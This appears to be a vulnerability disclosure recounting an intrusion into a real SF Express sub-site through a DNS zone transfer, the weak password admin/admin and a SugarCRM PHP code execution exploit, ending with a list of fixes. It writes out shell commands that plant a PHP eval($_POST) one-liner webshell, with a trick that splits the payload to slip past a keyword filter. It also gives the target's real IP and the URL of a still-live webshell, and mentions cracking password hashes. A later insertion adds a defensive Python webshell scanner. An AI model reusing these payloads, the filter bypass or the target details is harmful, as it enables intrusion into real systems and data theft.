PHP code execution vulnerability and repair in a sub-station of SF Express

Source: Internet
Author: User
Tags: touch command, domain transfer

This is actually a chain of several vulnerabilities, including PHP code execution and information leakage, which together lead to a WebShell on the server.

1. DNS Zone Transfer (Domain Transfer) Vulnerability
 
2. PHP Code Execution Vulnerability
The IP addresses collected from the zone transfer were fed into Nmap, which turned up some risky systems.
Address: http://219.134.187.130:8085/index.php?module=Users&action=Login
The weak password admin/admin gave access to the admin backend.
 
Once inside, we found that the SugarCRM version was 6.2.3, so we used the latest exploit for it (user authentication required).
CVE: CVE-2012-0694, SugarCRM CE <= 6.3.1 "unserialize()" PHP Code Execution
 
This gave us a reverse shell.
 
There was a detour before getting the WebShell: wget did not work, apparently because the firewall blocked outbound connections from the server. touch worked, vi did not, so only echo was available. So we created a file 1.php with touch and wrote its contents with echo.
 
touch 1.php
echo "<?php eval($_POST[cmd])?>" > 1.php
However, every time the file was written, $_POST was filtered out, as shown below.
 
So I thought of the trick from gainover's XSS write-up (see http://www.wooyun.org/bugs/wooyun-2012-07854), haha.
So, the first line:
 
echo -n "<?php eval($" > 1.php
The second line:
 
echo -n "_POST[cmd])?>" >> 1.php
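As an added example that is not part of the original report, the following Python scanner (names and regex are my own, written for illustration) flags a PHP file when a code- or command-execution sink takes request input within the same statement. Run over the one-liner above, it fires on the finished file whether it was written in one echo or in two fragments, while a per-write check for the literal string $_POST matches neither fragment; the sample file contents are constructed from the payload shown above.

```python
import re

# Constructed sample input: the one-liner shell from the report, and the same
# bytes split into the two fragments it was written with.
WHOLE_SHELL = '<?php eval($_POST[cmd])?>'
FRAGMENTS = ['<?php eval($', '_POST[cmd])?>']

# A code/command-execution sink whose argument list (up to the next ';')
# references a request superglobal. Whitespace is tolerated around the call.
# Obfuscated variants (string concatenation, comments inside names) would
# need further signatures; this covers the plain form seen in the report.
WEBSHELL_RE = re.compile(
    r'\b(eval|assert|system|passthru|shell_exec|exec|popen)\s*\('
    r'[^;]*?\$_(POST|GET|REQUEST|COOKIE)\b'
)


def literal_post_filter(chunk: str) -> bool:
    """A per-write keyword check: True when this single chunk contains '$_POST'."""
    return '$_POST' in chunk


def scan_php(content: str) -> list:
    """Whole-file scan. Returns (sink, source) pairs, e.g. [('eval', 'POST')]."""
    return [(m.group(1), m.group(2)) for m in WEBSHELL_RE.finditer(content)]


def assemble(fragments) -> str:
    """Model the on-disk result of appending each fragment to the same file."""
    return ''.join(fragments)


def audit_writes(fragments) -> dict:
    """Compare per-fragment checks with a scan of the assembled file."""
    return {
        'blocked_per_fragment': [literal_post_filter(f) for f in fragments],
        'flagged_per_fragment': [scan_php(f) for f in fragments],
        'flagged_on_disk': scan_php(assemble(fragments)),
    }


if __name__ == '__main__':
    print(audit_writes([WHOLE_SHELL]))   # keyword filter and scan both fire
    print(audit_writes(FRAGMENTS))       # only the on-disk scan fires
```

The practical point for defenders is that any check on what is being written must be complemented by a scan of what ends up on disk in the web root.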
 
Then we connected with the Caidao (China Chopper) client and uploaded the WebShell.
 
WebShell address: http://219.134.187.130:8085/shell.php
It has not been deleted yet.
 
Database information:
 
After cracking the MD5 hashes, we got into the backend of the recruitment website.
 
3. Information Leakage, including Oracle database details
http://uatmobile.sf-express.com/SFMobile.xml
 
Solution:

1. Change the SugarCRM password.
 
2. Delete the file http://uatmobile.sf-express.com/SFMobile.xml.
 
3. Delete the WebShell http://219.134.187.130:8085/shell.php.
 
4. Stop the service if it is not in use, and separate the database from the application.
 
Any gifts? Haha, it seems that SF does not charge express delivery on gifts.
